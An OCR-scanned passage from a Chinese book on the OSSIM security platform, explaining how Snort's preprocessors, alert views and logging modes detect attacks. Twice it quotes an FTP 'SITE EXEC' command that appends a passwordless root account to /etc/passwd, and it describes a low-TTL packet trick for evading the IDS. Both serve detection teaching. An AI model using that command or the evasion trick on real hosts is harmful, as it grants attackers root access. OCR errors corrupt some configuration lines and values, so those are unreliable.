有 TCP 选项 时 需要 增加 。 

€ 10.0.0.2: 指定 发 包 的 目的 主机 。 


类 似 这 种 发 包工 具 很 多 ， 比 如 数据 包 发 送 工具 Packet Sender、ostinato， 也 可 用 来 作为 发 
包 的 工具 ， 使 它 能 够 发 送 和 接收 通过 TCP 和 UDP 的 网 络 数 据 包 ， 下 载 地 址 为 
http://packetsender.com/。 


小 结 


本 章 从 Linux 的 性 能 优化 技巧 开始 讲 起 ， 逐 步 过 渡 到 故障 排除 ， 最 后 到 OSSIM 系统 的 优 
化 方案 ， 并 运用 各 种 性 能 监测 工具 来 发 现 OSSIM 系统 出 现 的 性 能 瓶颈 。 
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第 4 章 
< Snort 规 则 分 析 > 


从 本 章 可 以 学 习 到 : 
预 处 理 器 
Snort 日 志 分 析 
数据 包 记录 模式 
规则 分 析 与 编写 
可 疑 流量 监测 

€ 异常 行为 分 析 

本 章 将 详细 讲解 OSSIM 平台 下 的 一 个 重要 组 成 部 分 Snort 它 是 一 种 拥有 实时 (Real-Time) 
流量 分 析 、 网 络 IP 数据 包 Packet) 记录 等 特性 的 强大 的 网 络 入 侵 检测 /防御 系统 。 由 于 OSSIM 
已 完美 集成 Snort 系统 ， 所 以 本 章 讲 解 会 集中 在 Snort 的 应 用 场景 、 应 用 方法 和 规则 分 析 上 ， 
这 些 内 容 也 是 Snort 真正 的 内 涵 所 在 。 本 章 讲解 Snort 的 内 容 是 以 后 使 用 Suricata 的 基础 ， 如 
不 特别 指明 ， 所 有 实验 环境 主要 以 OSSIM 3 为 基础 。 


预 处 理 程序 


6.1.1. MANER NA 

预 处 理 器 的 作用 是 通过 一 些 规则 的 设置 来 提前 检测 数据 包 是 否 存在 入 侵 的 风险 .所 有 预 处 
理 器 的 输入 和 输出 都 是 报 文 , 但 每 个 预 处 理 器 对 报 文 结构 的 字段 处 理 各 有 不 同 。 该 模块 由 功能 
各 不 相同 的 预 处 理 器 组 成 ， 可 实现 的 功能 包括 分 片 重组 、 端 口 扫 描 检 测 、 系 统 性 能 监测 等 。 
些 预 处 理 器 可 以 通过 对 数据 包头 部 进行 检测 ， 如 果 发 生 异 常 则 产生 告警 ， 这 为 Snort 检测 引擎 
分 析 数 据 包 打 下 了 基础 。 以 Snort 2.9.0.5 版 本 为 例 提 供 了 14 个 预 处 理 器 插件 。 表 6-1 对 它们 的 
功能 做 了 简单 的 描述 。 
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表 6-1 预 处 理 程序 分 类 及 功能 


插件 分 类 功 能 
Frag3 重组 IP 分 片 ， 只 处 理 属于 IP 分 片 的 数据 包 ， 并 对 一 些 基 于 耳 分 片 的 攻击 进行 检测 
Stream5 可 对 TCP, UDP 等 报 文 进行 会 话 重 组 ， 跟 踪 TCP、UDP、ICMP 会 话 的 状态 信息 ， 可 检 


测 出 一 些 针 对 TCP 协议 的 攻击 等 

ARP Spoof 针对 ARP 报 文 的 某 些 类 型 检测 

BO 检测 Back Office 攻击 

HttpInspect 该 插件 解析 HTTP 报 文 ， 发 现 一 些 针对 HTTP 协议 的 攻击 ， 只 能 一 次 检测 一 个 报 文 ， 而 
不 能 将 一 个 HTTP 会 话 中 不 同 的 报 文 关联 起 来 进行 检测 

Performance 通过 多 种 统计 指标 监测 Snort 运行 期 间 的 性 能 ， 并 汇总 到 指定 位 置 


Monitor 


sfPortscan 检测 端口 扫描 行为 
SMTP 检测 SMTP 流量 ， 并 对 数据 内 容 进行 规范 化 
Ftp/Telnet 检测 FTP/TELNET 流量 ， 并 对 数据 内 容 进行 规范 化 
SSH 检测 Challenge-Response 缓冲 溢出 攻击 、CRC32〈 循 环 见 余 校 验 ) 攻击 
SSL/TLS 检测 SSL/TLS 流量 
DNS 处 理 DNS 应 答 ， 可 检测 DNS Client Data 溢出 ， 废 弃 的 记录 类 型 
在 配置 snort.conf 时 ， 有 下 列 预 处 理 程 序 大 家 必须 了 解 。 
1. Frag3 


frag3 预 处 理 能 检测 与 IP 包 分 段 有 关 的 攻击 类 型 , 它 是 Snort 应 对 IP 分 段 攻击 的 有 效 武 器 。 
该 预 处 理 程序 对 于 Snort 非常 重要 ， 因 此 不 要 禁用 它 。 


He 自 Snort 2.7.0 版 起 ， 采 用 了 frag3 代替 原先 的 frag2， 还 加 入 了 新 的 元 素 stream5。fiag3 数 
| 据 处 理 能 力 更 强 ， 而 且 适 用 于 分 布 式 环境 。 


为 了 更 好 地 认识 它 ， 我 们 首先 打开 /etc/snort/snort.conf 文件 ， 查 看 197 TAR, wA 6-1 
所 示 : 


图 6-1 frag3 参数 配置 


我 们 知道 ， 以 太 网 中 任何 一 个 长 度 超过 1500 bytes 的 IP 数据 包 必须 进行 分 段 ， 这 种 分 段 ， 
在 源 端 和 中 介 路 由 器 都 会 发 生 , 在 数据 分 段 后 , 在 目标 主机 上 重 装 , 攻击 者 可 以 利用 这 一 重新 
装配 过 程 进行 攻击 。 这 里 , 攻击 者 就 是 利用 分 段 重 写 TCP 头 数据 来 绕 过 防火 墙 和 IDS 设备 的 。 

为 了 方便 实验 ， 大 家 不 必 从 头 安装 这 个 工具 ， 可 以 在 BackTracks 工具 箱 中 直接 找到 
fragroute 工具 ， 用 来 模拟 这 种 攻击 。 我 们 可 以 通过 frags 的 一 些 附加 的 配置 选项 ， 检 测 这 种 类 
型 的 攻击 。 
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接 下 来 我 们 讲解 frag3 选项 ， 该 选项 包括 “preprocessor frag3_global” 和 “preprocessor 
frag3_engine” 两 个 子 项 ， 每 一 项 都 有 参数 描述 。 下 面 讲解 一 下 主要 参数 。 


(1) timeout. CAVE, MH s 表示 ) 

设置 分 段 可 以 持续 的 秒 数 ， 如 果 分 段 没有 在 规定 的 时 间 内 完成 ， 就 会 被 丢弃 ， 默 认 值 是 
60s。 如 果 被 监控 网 段 经 常 出 现 IP 分 段 ， 例 如 有 大 量 的 分 段 流量 ， 建 议 减少 该 数值 ， 以 避免 误 
报 。 假 如 攻击 者 猜测 到 frag3 默认 值 为 60s， 就 会 利用 该 信息 来 躲避 监控 ， 这 时 可 以 适当 增 大 
该 值 来 防止 这 种 攻击 。 注 意 : 在 OSSIM 里 设置 为 180s。 

(2) memcap 

memcap 表示 frag3 预 处 理 可 以 使 用 的 内 存 大 小 ， 默 认为 4MB。 

(3) min ttl 

指定 frag3 能 接收 包 的 最 小 TTL 值 ， 默 认 值 为 1， 取 值 范围 是 1~255。 只 要 低 于 该 值 就 会 
被 丢弃 。 我 们 知道 对 于 数据 包 来 讲 ，TTL 就 好 比 一 个 “死亡 ”计数 器 ， 被 路 由 器 传递 一 次 就 
减 1， 如 果 TTL 值 到 达 0， 该 包 就 会 被 丢弃 ， 不 再 继续 传递 。 攻 击 者 利用 这 一 特性 ， 在 攻击 包 
中 插入 垃圾 数据 ， 就 能 使 Snort 无 法 识别 ， 从 而 不 能 检测 出 这 种 攻击 。 例 如 ， 假 设 图 6-1 有 3 
个 包 是 针对 FTP Server 的 攻击 : 


Packet 1 
QUOTESITE TTL=60 


Packet 2 
inserted datadata TTL=1 


Packet 3 


EXEC echo toor::0:0:/:/bin/sh>>/etc/passwd TTL-120 


Snort 在 收 到 这 三 个 数据 包 后 会 将 该 攻击 看 成 如 下 内 容 : 


| QUOTE SITE inserted datadata | EXEC echo toor::0:0:/:/bin/sh7-/etc/passwd | 


正 是 由 于 插入 了 第 2 个 包 的 垃圾 数据 “inserted datadata” 所 以 Snort 没有 任何 一 条 规则 和 
它 匹配 ， 而 垃圾 数据 在 到 达 目 标 主机 之 前 ， 由 于 耗 尽 TTL 而 被 丢弃 ， 所 以 目标 主机 接收 到 的 
真实 攻击 为 : 


| QUOTE SITE | EXEC echo toor::0:07/:/bin/sh7—/etc/passwd | 
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这 样 精心 处 理 的 数据 包 到 达 对 方 主机 就 有 可 能 成 功 实施 攻击 所 以 我 们 在 该 选项 中 合理 设 
定 这 个 值 ， 以 丢弃 那些 TTL 值 很 低 的 包 ， 这 样 就 可 以 防止 这 种 躲避 技术 。 
(4) overlap limit 
检测 每 个 包 的 重合 分 片 数 量 ， 默 认为 0〈 代 表 不 限制 )。 如 果 希 望 进行 异常 检测 就 必须 选 
中 它 。 由 图 6-1 可 以 看 出 在 OSSIM 系统 里 其 值 设置 为 10。 


(5) min fragment length 
min fragment length 定义 了 最 小 分 片 大 小 〈 即 有 效 载 荷 的 大 小 ) 在 进行 异常 检测 时 ， 如 果 
数据 包 的 分 段 小 于 等 于 这 个 限定 值 ， 就 会 被 认为 是 恶意 行为 。min_fragment_length 默认 为 0， 
在 系统 中 该 值 设 定 为 100。 


(6) policy 

选择 目标 的 碎片 整理 模式 ， 可 用 模式 有 : first, last, bsd, linux, windows 和 solaris. $R 
认为 bsd 模式 。 

2. Stream5 

Streams 和 上 面 介绍 的 frag3 有 点 类 似 ， 它 可 预 处 理 被 用 来 维持 TCP 流 的 状态 ， 检 测 某 些 
信息 收集 类 型 的 攻击 , Streams 预 处 理 器 使 Snort 具备 流 重 组 和 状态 分 析 的 能 力 , 能 够 跟踪 TCP 
和 UDP 会话 。Streams5 给 用 户 提供 超过 256 个 TCP 同步 连接 , 最 大 能 够 处 理 1,048,576 个 TCP 
同步 连接 。Stream 5 还 可 以 检测 和 处 理 数 据 覆 盖 、TCP IE TRIER. SYN 包 存 在 净 荷 .FIN 和 RESET 
序列 号 等 方面 存在 的 异常 ， 表 6-2 对 streams 的 主要 选项 进行 了 描述 。 


表 6-2 Stream5 选项 及 描述 


TCP 会 话 跟 踪 ， 默 认为 启用 
最 大 同时 TCP 会 话 跟踪 ， 默 认为 262144， 取 值 范 围 是 1~1048576 


内 存 容量 选项 ， 用 于 限制 Streams 预 处 理 可 以 使 用 的 内 存 大 小 ， 默 认为 
8388608 (8MB) ， 范 围 是 32768~1073741824， 也 就 是 32KB~1GB， 如 
果 监 控 网 段 有 大 量 会 话 ， 应 该 谨慎 增加 这 一 值 


最 大 同时 IP 会 话 跟踪 数 ， 默 认 是 16384， 范 围 是 1~1048576 
默认 启用 UDP 跟踪 会 话 
默认 关闭 ICMP 跟踪 会 话 


设置 对 话 可 以 持续 的 秒 数 ， 如 果 对 话 没 有 在 规定 的 时 间 内 完成 ， 就 会 被 
清理 。 默 认 值 为 30s， 系 统 里 设 定 为 180s 


表示 启用 TCP 协议 异常 检测 报警 


track tcp <yes|no> 


max tcp «num sessions 


memcap «num bytes 


max ip «num sessions» 


track udp <yes|no> 


track icmp <yes|no> 


timeout 


detect anomalies 


利用 Streams 进行 状态 检查 ， 可 以 帮助 Snort 匹配 多 种 攻击 。 例 如 Streams 预 处 理 能 检测 
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到 攻击 者 利用 TOP 流 隐藏 信息 收集 流量 的 试探 ， 最 有 代表 的 就 是 TC 半 开 放 式 扫描 ， 利 用 这 
种 扫描 方式 ，TCP 三 次 握手 不 会 完成 ， 也 就 是 攻击 者 不 再 会 发 送 ACK 包 完 成 三 次 握手 。 该 方 
式 能 骗 过 没有 监控 流 状态 的 老式 IDS， 它 还 可 以 进行 不 断 扩展 ， 用 以 对 付 一 种 引起 针对 Snort 
拒绝 服务 的 无 状态 攻击 。 我 们 接着 看 配置 文件 ， 如 图 6-2 所 示 。 


mbly. For more inf ee README 
tcp yes, track udp icmp no 


5 tcp: policy first, de nonal ie: e 3uhs 180, \ 


37 139 143 \ 
7 6668 6669 5 


J 636 901 992 993 994 995 1220 1414 1830 


3 9999 11 
11 preprocessor strean5 udp: timeout 180 


图 6-2 ”Stream5 参数 配置 


该 Stream5 预 处 理 器 是 基于 针对 Snort 目标 TCP 重组 模块 ， 它 完全 取代 原先 Snort 版 本 中 
的 Stream4 和 流 处 理 器 ， 它 能 跟踪 TCP/UPD 会 话 。Streams 全 局 配置 格式 如 下 : 


preprocessor stream5 global: V 

track tcp «yes|no»], [max tcp «number»], \ 
memcap «number bytes»], \ 

track udp «yes|no»], [max udp «number»], \ 
track icmp Xyes|no»], [max icmp «number»], V 
track ip Xyes|no»], [max ip <number>], V 
flush on alert], [show rebuilt packets], \ 


prune log max «bytes»], [disabled] 

3. RPC decode 

Snort 从 2.7.0 的 版 本 起 ， 采 用 HTTP. decode 作为 预 处 理 ， 负 责 检 测 异 常 的 HTTP 流量 ， 
并 且 使 其 标准 化 ,以便 检 测 引擎 能 正确 地 对 其 解释 。RPC decode 预 处理 与 HTTP. decode 功能 
相似 ， 不 过 它 是 针对 RPC 协议 。RPC 能 被 攻击 者 用 来 侦察 和 远程 攻击 。 攻 击 者 利用 端口 映射 
程序 ， 比 如 rpcbind 和 portmapper 有 可 能 对 远程 服务 动态 绑 定 ， 攻 击 者 利用 rpebind 收集 信息 、 
发 现 其 他 目标 、 进 行 缓冲 区 溢出 攻击 或 者 RPC 服务 攻击 。 

- 些 高 明 的 攻击 者 希望 通过 隐藏 RPC 流 量 来 躲避 IDS 系统 的 监控 。 如 RPC 特征“0186A0”， 

这 一 特征 被 分 散在 多 个 包 内 ， 那 么 Snort 就 无 法 对 其 匹配 。 所 以 我 们 要 用 RPC_decode 预 处 理 
进行 标准 化 。RPC_decode 有 一 个 配置 选项 “ports list”， 它 可 以 列 出 所 需要 用 RPC_decode XE 
行 标准 化 处 理 的 RPC 端口 ,其 默认 值 为 111 81 32770-32779, 在 OSSIM 中 的 /etc/snort/snort.conf 
文件 中 ， 第 248 行 ， 参 数 配置 如 图 6-3 所 示 。 
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£48 # ÜNC-RPC normalization o t io information, see the Snort Manual, Conf 


p51 # Back Orifice detection 
[252 preprocessor bo 


图 6-3 rpe decode 参数 配置 

4. BO 

BO (Back Orifice) 预 处 理 检 测 ， 有 代表 的 实例 是 古老 的 BO2K (Back Orifice 2000)， 它 
除了 可 以 用 于 Winows95/98 系统 ， 也 可 以 用 在 Windows NT/2000 操作 系统 上 。BO2K 包含 了 
Back Orifice 所 具有 的 功能 。 我 们 在 OSSIM 3 系统 的 /etc/snort/rules/backdoor.rules 规则 文件 中 
就 能 找到 Back Orifice 2000 backdoor。 它 虽然 是 古老 的 木马 ， 但 以 它 为 原型 ， 改 进 成 更 加 先进 
的 特洛伊 木马 ， 依 然 具 有 一 定 的 威胁 。 一 些 脚 本 小 子 们 常 利用 它 获 取 远 程 系统 的 控制 权 。 启 用 
BO 检测 只 需 在 snort.conf 中 加 入 下 面 一 行 ， 在 OSSIM 中 配置 如 图 6-3 所 示 。 


Preprocessor bo 


5. FTP 和 Telnet 


由 于 Telnet 和 FTP 协议 有 关 ， 在 预 处 理 中 放 到 了 一 起 。 它 可 以 对 Telnet 或 FTP 流 中 的 任意 嵌 
入 二 进 制 控制 SERIEM 码 。 黑 客 在 试探 中 将 控制 代码 插入 流量 中 来 躲避 Snort 检测 。 控 制 代码 插 
入 常 利 用 SITE EXEC 这 个 FTP 命令 也 和 它 的 漏洞 有 关 。 例 如 攻击 者 利用 FTP 命令 SITE EXEC, 
通过 FTP 链接 来 执 命令 ， 键 入 如 下 所 示 的 FTP 命令 就 可 以 收 到 passwd 文件 : 


QUOTE SITE EXEC echo toor::0:0::/:/bin/sh >>/etc/passwd 


有 些 攻击 者 可 以 将 Telnet 控制 代码 分 布 在 这 条 命令 中 , 希望 躲避 Snort 检测 有 关 fip telnet 
参数 配置 参看 OSSIM 配置 文件 /etc/snort/snort.conf 第 315 行 ， 如 图 6-4 所 示 。 


图 6-4 fip telnet 参数 配置 
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6. ARPspoof 

ARPspoof 是 一 个 检测 ARP 协议 流量 的 预 处 理 程 序 。 目 前 涉及 ARP 的 攻击 种 类 繁多 ， 它 
们 都 是 以 ARP 欺骗 为 基础 ，ARP 欺骗 通过 构造 特殊 ARP 请 求 和 应 答 包 来 达到 目的 ， 而 伪造 
的 ARP 应 答 包 ， 被 存储 在 接收 计算 机 的 ARP 缓存 中 。 

ARP 欺骗 的 危害 是 能 够 误导 流量 ， 这 很 可 能 造成 交换 网 络 的 一 种 试探 ，ARP 欺骗 也 能 
来 进行 一 些 简单 而 有 效 的 Dos 攻击 ， 当 伪造 的 封包 中 包含 无 效 的 IP-MAC 映射 时 ，ARP 应 答 
就 会 淹没 目标 设备 ARP 缓存 ， 从 而 导致 DOS 攻击 ， 这 将 引起 目标 设备 向 不 存在 的 设备 发 送 
流量 。 而 ARPspoof 预 处 理 ， 不 但 能 检测 此 类 攻击 和 ARP 欺骗 试探 ， 而 且 能 检测 到 ARP 高 速 
缓存 重 写 攻击 ， 它 的 配置 选项 为 host IP address host MAC address (主机 IP 地 址 主机 MAC 地 
址 )， 参 数 配置 在 snort.conf 的 400 行 ， 如 图 6-5 所 示 。 


图 6-5 ARPspoof 配置 


图 中 的 例子 为 : 
192.168.40.1 f0:0f:00:f0:0f:00 


若 想 用 ARPspoof 监控 的 某 一 台 设 备 必 须 制定 这 台 设 备 的 IP-MAC 地 址 映射 ， 对 每 一 台 设 


备 都 要 在 snort.conf 文件 中 用 新 的 一 行列 出 。 映 射 一 旦 变化 ， 就 必须 重 配 该 文件 。 注 意 : 在 启 
用 ARPspoof 之 前 应 该 将 DHCP 获取 IP 的 设备 改 成 静态 IP 地 址 。 
7. Sfportscan 


Sfportscan 模块 可 用 来 应 对 网 络 攻 击 前 的 侦查 (Reconnaissance) 阶段 的 扫描 行为 ， 因 为 在 
攻击 发 起 之 初 , 攻击 者 对 目标 网 络 并 不 了 解 , 为 了 得 到 目标 网 络 的 服务 及 协议 , 往往 会 使 用 传 
统 的 端口 扫描 工具 , 盲目 发 起 扫描 , 以 获得 目标 主机 的 回应 , 当然 正常 情况 下 这 种 回应 非常 少 ， 
攻击 者 最 常用 的 扫描 工具 类 似 于 nmap, mM sfportscan 恰好 是 应 对 这 种 扫描 的 工具 ， 它 能 应 对 
如 表 6-3 所 示 的 扫描 类 型 。 


表 6-3 sfportscan 侦 测 的 扫描 类 型 


TCP Portscan 一 台 主机 扫描 另 一 台 主 机 的 多 个 端 

UDP Portscan 

IP Portscan 

TCP Decoy Portscan 攻击 者 将 自己 来 源 混合 在 多 个 虚假 源 地 址 发 起 的 扫描 这 种 策略 往往 可 
UDP Decoy Portscan 以 隐藏 攻击 者 的 真实 位 置 

IP Decoy Portscan 
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( 续 表 ) 


多 台 主 机 对 一 台 目 标 主机 进行 扫描 ， 往 往 用 来 欺骗 IDS 或 控制 主机 


E 机 扫描 多 台 主 机 的 某 一 个 端口 ， 如 80 端口 


对 于 sfportscan 的 配置 ， 使 用 sfportscan 预 处 理 前 提 是 首先 使 用 Stream5 preprocessor， 它 
可 以 指出 类 似 于 UDP 和 ICMP 无 连接 协议 的 端口 方向 。 
Preprocessor sfportscan: 

可 用 参数 如 下 : 

€ proto <protocol>: 协议 可 选择 的 值 包括 TCP、UDP、IP_proto、IGMP、ALL. 

€  scantype <scan type»: 扫描 类 型 可 选择 的 值 包 括 portscan. portsweep、decoy portscan、 
distributed portscan, all, 

€ sense level <level>: 级 别 可 选择 的 值 包括 low, medium, high. 

€ watch ip <ipllip2/cidr[[portlport2-port]]>: 指定 要 被 检测 的 ip 及 port. 

€ ignore scanners <ipllip2/cidr[[portlport2-port3]]>: 忽略 来 源 的 扫描 警报 。 

€ ignore scanned < ipllip2/cidr[[portlport2-port3]]>: 忽略 目的 地 扫描 报警 。 

© logfile <file>: 输出 logfile 到 指定 的 地 方 ， 若 使 用 相对 位 置 ， 则 该 文件 会 放 在 Snort 
配置 目录 中 。 


下 面 看 一 下 OSSIM 系统 中 snort.conf 配置 文件 的 396 行 ， 如 图 6-6 Pros: 


ee README .sfp 


图 6-6 sfportscan 配置 
实际 应 用 中 通常 利用 sfportscan 预 处 理 器 ， 找 出 潜在 Malware (流氓 软件 )。 


6.1.2 ”调整 预 处 理 程序 

Snort 实施 检测 是 由 于 某 些 类 型 的 通信 中 包含 了 恶意 流量 ， 消 耗 过 多 的 资源 ， 这 时 出 现 
Snort 丢 包 现象 ， 这 就 相当 于 Snort 失效 一 样 。 这 种 情况 怎么 解决 呢 ? 可 以 采用 调整 预 处 理 程 
序 。 攻 击 者 一 次 攻击 中 ， 可 能 展开 成 千 上 万 个 包 ， 如 果 预 处 理 程序 由 于 没有 分 配 到 足够 内 存 ， 
而 不 能 标准 化 处 理 它们 时 ， 这 种 攻击 将 通过 Snort， 而 不 被 检测 到 。 

预 处 理 程序 需要 消耗 系统 资源 , 比如 一 个 预 处 理 程序 没有 足够 的 内 存 来 处 理 ， 一 次 攻击 会 
分 解 成 若干 个 包 ， 如 果 分 配 预 处 理 程序 内 存 不 足 ， 就 会 无 法 展开 ， 并 处 理 这 些 包 ，Snort 即 会 
遗漏 攻击 的 具体 细节 。 我 们 通过 调整 预 处 理 程序 便 能 改变 这 一 现象 。 
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6.1.3 网络 攻击 模式 分 类 

OSSIM 中 的 图 形 化 Alarm 报警 是 通过 数据 挖掘 方法 ， 从 庞大 的 报警 事件 中 提取 网 络 入 侵 
模式 , 后 台 主 要 是 依托 的 关联 规则 算法 和 序列 规则 算法 , 其 核心 被 用 户 提取 每 个 链接 记录 内 部 
和 记录 间 的 特征 模式 。 根 据 Snort 扫描 类 型 的 不 同 将 网 络 攻 击 模式 分 为 以 下 几 类 ， 每 一 类 在 
OSSIM 中 都 有 特定 的 图 例 显示 。 


CD. 从 内 网 发 往外 网 的 一 对 多 模式 Cinternal to external one-to-many) 


Dee ^ ， 实 例如 图 6-7 所 示 。 这 种 情况 下 你 可 看 到 一 个 P 地 址 向 多 个 IP 地 
址 发 送 大 量 数据 ， 那 么 它 有 可 能 是 邮件 服务 器 也 有 可 能 是 垃圾 邮件 僵尸 ， 或 者 是 网 络 端口 扫描 。 


D] 201590227 open © Bruteforce Authentication SSH 1 e=- 
DELIVERY & ATTACK: BRUTEFORCE i 
AUTHENTICATION 1 79 


iow [8] eurn 


o vemo o mc ATTACK PATTERN SOURCE ?DESTINATION 


Io msm pen Ah cac communeaon seat osean 2 e 一 wazon 二 os3lzzshnp m 


e 
ei 
a 


图 6-7 内 网 发 往外 网 的 一 对 多 模式 
(2) 从 外 网 到 内 网 的 一 对 一 模式 Cexternal to internal one-to-one) 


右 侧 为 它 的 图 标 一。 ， 实 例如 图 6-8 所 示 。 这 种 情况 下 ， 数 据 从 一 个 IP 地 址 传输 
到 另 一 个 IP 地 址 ， 意 味 着 常规 服务 器 通信 ， 不 过 也 有 可 能 是 针对 特定 系统 的 目标 攻击 。 


2nours e Ponson Nmap 1 一 
RECONNAISSANCE & PROBING: PORTSCAN ] 
asosa oen G ennererce aurenicaton sH 1 — ge nserverssh 
es ; 54 1 1 
EAL numos arent W amant enis mal 


6-8 ”外 网 到 内 网 的 一 对 一 模式 
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G) 外 网 间 的 多 对 一 模式 Cexternal to external many-to-one) 
ERRERA c« ， 实 例如 图 6-9 所 示 ， 当 你 发 现 多 个 IP 地 址 发 送 数据 到 一 个 IP 地 址 ， 
这 有 可 能 是 Syslog 服务 器 ， 也 有 可 能 是 针对 目的 TP 地 址 的 分 布 式 DOS 攻击 。 


ome Qo ricos we opioa Memesreaemm 08 < prp 
DELIVERY & ATTACK: MALICIOUS WEBSITE s E y x 
© EXPLON | 2 22 $ 


图 6-9 外 网 间 的 多 对 一 模式 


(4) 内 网 中 一 对 一 模式 (internal one-to-one) 
右 侧 为 它 的 图 标 "”” ， 实 例如 图 6-10 所 示 。 


Multiple login failures - 


D] 20150227 open Qe Bruteforce Authentication 3 Og Virtual USMAIIInOne 
HIDS reported 
DELIVERY & ATTACK: BRUTEFORCE à ! pun 
© AUTHENTICATION 3 8 


2015.03.04 open 中 Bruteforce Authertication "Windows Login 1 .—e windows70 windows70 


$ DELIVERY & ATTACK: BRUTEFORCS AUTHENTICATION : 17 20 1 
; > aids Blasi. : 


图 6-10 内 网 中 一 对 一 模式 
(5) 外 部 到 外 部 的 一 对 一 模式 Cexternal to external one-to-one) 
右 侧 为 它 的 图 标 ~ ， 实 例如 图 6-11 所 示 。 
our O (tomoenansn-paswonnoesret reiner 1 一 1921683 2Tenet 1921581532517 
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图 6-11 外 部 到 外 部 的 一 对 一 模式 


通过 以 上 5 种 模式 的 图 形 化 显示 , 今后 管理 员 无 须 仔细 分 析 日 志 , 只 要 观察 图 像 就 能 快速 
分 辨 出 攻击 类 型 。 
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Snort 日 志 分 析 利 器 


要 深入 分 析 OSSIM 中 SIEM 控制 台 显 示 的 内 容 ， 首 先 要 知道 Snort 的 日 志 分 析 方 法 ， 我 
们 先 看 看 下 面 3 种 工具 : 
€ ACID: 老 款 管理 员 控 制 台 。 
€ BASE: 被 称 为 基本 的 分 析 和 安全 引擎 ， 它 是 基于 PHP 的 分 析 引 擎 ， 可 以 搜索 、 处 理 
由 IDS、 防 火 墙 、 网 络 监视 工具 所 生成 的 安全 事件 数据 。 由 于 BASE 目前 已 停止 升 
级 , 采用 SuricatatBarnyard2+BASE 是 当下 较为 流行 的 一 种 轻 量 级 IDS 系统 ， 这 种 系 
统 的 搭建 是 在 SnortHACID 架构 基础 上 演变 而 来 的 ， 需 要 的 软件 包 有 Suricata, 
Barnyard2、Base、Yaml、Adodb、Snort 的 规则 库 等 。 

€ Sguil: 这 是 一 款 被 称 为 网 络 安全 专家 监视 网 络 活动 的 控制 台 工具 ， 它 可 以 用 于 网 络 
安全 分 析 。 其 主要 部 件 是 一 个 直观 的 GUI 界面 ， 可 以 为 Snort/Barnyard 提供 实时 的 
事件 活动 监控 。 用 于 网 络 安全 监视 (Network Security Monitoring ， 简 称 NSM ) 活动 
和 1IDS 警告 的 事件 驱动 分 析 。 

这 几 种 工具 安装 有 一 定 难度 即便 是 熟悉 这 种 架构 和 安装 方法 的 工程 师 也 需要 费 一 番 功 夫 
进行 安装 调试 。 如 果 大 家 不 愿 手工 安装 这 些 工具 ， 那 么 可 以 使 用 Security Onion， 它 集成 了 以 
上 三 款 工具 ， 基 于 ISO 镜像 的 安装 方式 方便 部 署 ， 为 初学 者 节省 了 不 少时 间 ， 有 关 它 的 使 用 
方法 大 家 可 以 到 作者 博客 继续 学 习 。 


Snort 日 志 分 析 


当 Snort 启动 后 , 会 不 停 地 抓 取 网 络 上 的 数据 包 , 因此 它 会 在 硬盘 上 记录 大 量 的 报警 信息 。 
未 处 理 的 大 量 日 志 信 息 对 用 户 来 讲 是 无 意义 的 ， 因 此， 需要 对 日 志文 件 的 内 容 进 行 分 析 ， 从 无 
序 日 志 中 获取 有 价值 的 信息 ， 这 样 才 可 以 帮助 用 户 针对 攻击 威胁 采取 必要 措施 。 

Snort 的 日 志 一 般 位 于 /var/log/snort/ 目 录 下 。 可 以 通过 修改 配置 文件 来 设置 Snort 的 报警 形 
式 。 基 于 文本 的 格式 、Libpcap 格式 和 数据 库存 储 是 Snort 最 重要 的 3 种 报警 形式 。 本 节 主 要 
对 各 种 报警 形式 及 其 配置 进行 说 明 。 


6.3.1 工作 模式 
Snort 具有 3 种 工作 模式 ， 分 别 为 嗅 探 器 模式 、 分 组 日 志 模式 与 网 络 入 侵 检测 模式 。 


(1) 嗅 探 器 模式 
Snort 使 用 Libpcap 包 捕 获 库 ， 在 这 种 模式 下 ，Snort 使 用 网 络 接口 的 混杂 模式 读 取 并 解析 
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数据 包 。 该 模式 使 用 命令 如 下 : 
#snort -v 


命令 执行 结果 如 下 : 


alienvault:~# snort -v |more 
Running in packet dump mode 


--== Initializing Snort ---- 
Initializing Output Plugins! 
pcap DAQ configured to passive. 
Acquiring network traffic from "eth0". 
Decoding Ethernet 


--== Initialization Complete ==-- 


"OM -*» Snort! «*- 
o" )« Version 2.9.0.4 (Build 111) 
vov By Martin Roesch & The Snort Team: http://www.Snort.org/snort/snort-t 
eam 

Copyright (C) 1998-2011 Sourcefire, Inc., et al. 
Using libpcap version 1.1.1 
Using PCRE version: 7.6 2008-01-28 
Using ZLIB version: 1.2.3.3 


Commencing packet processing (pid=6569) 

07/09-14:22:17.240957 10.32.14.133:22 -» 10.32.14.131:64648 

TCP TTL:64 TOS:0x10 ID:18173 IpLen:20 DgmLen:600 DF 

***AP*** Seq: Ox76EE71AE Ack: 0x3AA37122 Win: 0x11 TcpLen: 20 
=+=+=+=+=+=+=+=+=+=+=+ 二 + 二 + 二 +=+ 二 + 二 + 二 + 二 + 二 +=+ 二 + 二 + 二 +=+=+=+ 二 +=+ 二 十 =+ 二 + 二 + 二 + 二 = 十 = 十 


Run time for packet processing was 2.336315 seconds 
Snort processed 97 packets. 
Snort ran for 0 days 0 hours 0 minutes 2 seconds 


48 


97 (100.0001) 

Dropped: 0 ( 0.0001) 

Filtered: 0 ( 0.000$) 

Outstanding: O ( 0.0001) 
0 


Breakdown by protocol (includes rebuilt packets): 


Eth: 97 (100.0001) 

0 ( 0.000%) 

95 ( 97.9381) 

0 ( 0.0005) 

0 ( 0.000%) 

22 ( 22.6808) 

73 ( 75.2583) 

0 ( 0.000%) 

IP6 Ext: 0 ( 0.0005) 


注意 : 这 里 的 参数 是 小 写字 母 v， 而 大 写 V 则 是 显示 snort 版 本 。 以 上 结果 只 显示 TCP/IP 
网 络 数据 包头 信息 ， 如 果 想 查看 详细 的 应 用 层 数据 信息 ， 则 需要 输入 以 下 命令 : 


#snort -vd 


命令 执行 结果 如 下 : 
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一 一 OSSIM 最 佳 实 


Initializing Output Plugins! 

pcap DAQ configured to passive. 
Acquiring network traffic from "eth0". 
Decoding Ethernet 


--== Initialization Complete 一 -- 


-*» Snort! «*- 
o" )- Version 2.9.0.4 (Build 111) 

1»! By Martin Roesch & The Snort Team: http://www.snort.org/snort/snort-team 
Copyright (C) 1998-2011 Sourcefire, Inc., et al. 
Using libpcap version 1.1.1 

Using PCRE version: 7.6 2008-01-28 

Using ZLIB version: 1.2.3.3 


Commencing packet processing (pid=8133) 
07/09-14:31:45.391925 10.32.14.133:22 -> 10.32.14.131:64648 
TCP TIL:64 TOS:0x10 ID:18488 IpLen:20 DgnLen:600 DF 

***AP*^* Seq: Ox76FÜ6DEE Ack: Ox3AA38F72 Win: 0x13 Teplen: 20 
